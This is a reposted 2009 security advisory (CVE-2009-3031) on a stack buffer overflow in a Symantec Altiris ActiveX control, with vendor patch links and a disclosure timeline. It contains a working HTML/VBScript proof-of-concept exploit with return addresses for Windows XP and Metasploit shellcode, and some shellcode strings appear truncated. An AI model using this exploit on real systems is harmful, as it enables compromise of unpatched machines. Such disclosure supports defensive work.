13.11.41 NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control Buffer Overflow | |
______________________________ Security Advisory NSOADV-2009-001 ______________________________ ______________________________ Title: Symantec ConsoleUtilities ActiveX Control Buffer Overflow Severity: Critical Advisory ID: NSOADV-2009-001 Found Date: 09.09.2009 Date Reported: 15.09.2009 Release Date: 02.11.2009 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV- Vendor: Symantec (http://www.symantec.com/) Affected Products: Symantec Altiris Notification Server 6.x Symantec Management Platform 7.0.x Symantec Altiris Deployment Solution 6.9.x Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846 Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000 Remote Exploitable: Yes Local Exploitable: No CVE-ID: CVE-2009-3031 Patch Status: Vendor released an patch Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== Altiris service-oriented management solutions provide a modular and future-proof approach to managing highly diverse and widely distributed IT infrastructures. They are open solutions that enable lifecycle integration of client, handheld, server, network and other IT assets with audit-ready security and automated operation. (Product description from Symantec Website) Description: ============ During the first access of the Management Website an ActiveX Control will be installed (AeXNSConsoleUtilities.dll), in which the function "BrowseAndSaveFile" is vulnerable to a stack based buffer overflow. Name: ConsoleUtilities Class Vendor: Altiris, Inc. Type: ActiveX-Steuerelement Version: 6.0.0.1846 GUID: {B44D252D-98FC-4D5C-948C- File: AeXNSConsoleUtilities.dll Folder: C:\WINDOWS\system32 Proof of Concept : ================== <html> <title>NSOADV-2009-001</title> <object classid='clsid:B44D252D-98FC- </object> <script language='vbscript'> Sub Submit_OnClick For i=0 to 2 If document.ret.os(i).checked Then target=document.ret.os(i). End If Next EIP=unescape(target) arg1 = "" arg3 = "" arg4 = "" arg5 = "" junk=String(310, "A") 'junk morejunk=String(18, unescape("%u0041")) 'more junk // windows/exec - 224 bytes // http://www.metasploit.com // Encoder: x86/call4_dword_xor // EXITFUNC=seh, CMD=calc.exe code=unescape("%uc92b%ue983% "%u2dad%u8338%ufcee%uf4e2% "%u9c03%u5cff%uff6d%ub31d% "%u1ae9%u1e67%u52d7%uf81c% "%ua029%uff2c%u5d04%u6f7f% "%ued6d%ubd55%ud926%u3967% "%u7ee7%u04ce%u26af%ub319% "%ua029%uff2c%u4dde%ucc58% "%u26be%u1c75%u7ee7%ub34b% "%u26e2%ue82c%ue96f%u1c09% "%uf2be%ub377%u46f4%u65ab% "%uc5b6%ub31c%u2a89%uedd2% "%u305b%uedd2%uabda%u3251% "%uc294%u3847%u52b5%u5bf8% buf=junk+EIP+morejunk+break+ obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5 End Sub </script> <h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2> Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/ <h3>Some RET Infos:</h3> Overwrite EIP with AAAA (crash)<br> EIP=String(2, unescape("%u4141"))<br><br> XP SP2 Ger shell32.dll JMP ESP<br> EIP=unescape("%uaf0a%u77d5")< XP SP3 Ger shell32.dll JMP ESP<br> EIP=unescape("%u30D7%u7E68")< ------------------------------ <form name="ret"> <input type=radio name="os" value="%u4141%u4141"> DoS<br> <input type=radio name="os" value="%uaf0a%u77d5"> Windows XP SP2 German<br> <input type=radio name="os" value="%u30D7%u7E68"> Windows XP SP3 German<br> <input type=button name="Submit" VALUE="Exploit"> </form> <img src="http://sotiriu.de/images/ </html> Solution: ========= Symantec Security Advisory: http://tinyurl.com/y9fakve Hotfix (KB49568): Deployment Solution 6.9 SP3 https://kb.altiris.com/ Hotfix (KB49389): Notification Server 6.x Symantec Management Platform 7.x https://kb.altiris.com/ Disclosure Timeline (YYYY/MM/DD): ============================== 2009.09.09: Vulnerability found 2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.10.01) to Vendor 2009.09.15: Vendor response asking for resending the poc in a zipped and password protected file (AV problem) 2009.09.15: Resending zipped and password protected 2009.09.17: Symantec Security Response Team verifies the vulnerability 2009.09.22: Symantec product team verifies the finding 2009.09.29: Ask for a status update, because the planned release date is 2009.10.01. 2009.09.29: Symantec Security Response Team tries to get a time line from the product team. 2009.09.30: Changed release date to 2009.10.08 until a time line is known 2009.10.07: Ask for a status update, because the planned release date is 2009.10.08. 2009.10.07: Symantec Security Response Team informs me if all goes well they need one more week. 2009.10.07: Changed release date to 2009.10.15. 2009.10.14: Ask for a status update, because the planned release date is 2009.10.15. 2009.10.14: Symantec Security Response Team informs me that they have an issue with an update and they need one more week. 2009.10.14: Changed release date to 2009.10.22. 2009.10.21: Ask for a status update, because the planned release date is 2009.10.22. 2009.10.21: Symantec Security Response Team informs me that they have an issue with an update. 2009.10.21: Changed release date to 2009.10.29. 2009.10.28: Ask for a status update, because the planned release date is 2009.10.29. 2009.10.29: Symantec Security Response Team informs me that the patch will be released on 2009.11.02 at 9am PST. 2009.11.02: Symantec Security Response Team informs me that the patch and the Advisory is released. 2009.11.02: Release of this Advisory | |
|
Total comments: 0 | |